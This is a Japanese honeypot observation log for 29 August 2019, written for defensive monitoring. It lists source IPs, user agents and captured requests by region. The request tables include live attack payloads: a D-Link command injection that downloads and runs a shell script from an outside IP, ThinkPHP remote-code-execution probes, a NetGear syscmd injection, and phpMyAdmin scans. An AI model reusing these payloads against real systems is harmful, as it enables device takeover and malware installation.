ハニーポット(仮) 観測記録 2019/08/29分です。

特徴

Region：AP

ThinkPHPの脆弱性を狙うアクセス
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。

Region：US

ThinkPHPの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。

Region：EU

ThinkPHPの脆弱性を狙うアクセス
を確認しました。

他

アクセス数推移

AP：総アクセス数：33 (前日比：-24)
US：総アクセス数：42 (前日比：+27)
EU：総アクセス数：12 (前日比：-33)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	103.21.141.44	China
4	106.39.78.4	China
1	118.25.42.134	China
2	130.211.254.102	United States
1	172.104.242.173	United States
3	211.38.144.230	South Korea
4	212.64.35.136	China
7	60.12.172.21	China
6	77.247.110.69	Estonia
1	87.27.82.13	Italy

UserAgent一覧

件数	UserAgent
8	-
3	Go-http-client/1.1
1	Hakai/2.0
1	Mozilla/5.0
3	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	python-requests/2.22.0
6	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	HTTP/1.1
1	GET	/index.action	HTTP/1.1
1	GET	/login.action	HTTP/1.1
1	GET	/login.cgi?cli=aa%20aa%27;wget%20http://54[.]37[.]74[.]232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$	HTTP/1.1
3	GET	/manager/html	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1	HTTP/1.1
3	GET	/TP/index.php	HTTP/1.1
3	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/TP/public/index.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
2	HEAD	/robots.txt	HTTP/1.0
4	HEAD	/robots.txt	HTTP/1.1
3	POST	/TP/index.php?s=captcha	HTTP/1.1

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	172.104.242.173	United States
10	180.153.184.54	China
1	196.70.250.24	Morocco
1	211.215.249.186	South Korea
1	211.38.144.230	South Korea
27	76.101.73.104	United States
1	77.247.110.69	Estonia

UserAgent一覧

件数	UserAgent
2	-
1	Go-http-client/1.1
2	Mozilla/5.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
27	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1	HTTP/1.1
1	GET	/shell?busybox	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	POST	/index.php?s=captcha	HTTP/1.1

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
10	122.114.70.90	China
1	172.104.242.173	United States
1	77.247.110.69	Estonia

UserAgent一覧

件数	UserAgent
2	-
1	Go-http-client/1.1
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	POST	/index.php?s=captcha	HTTP/1.1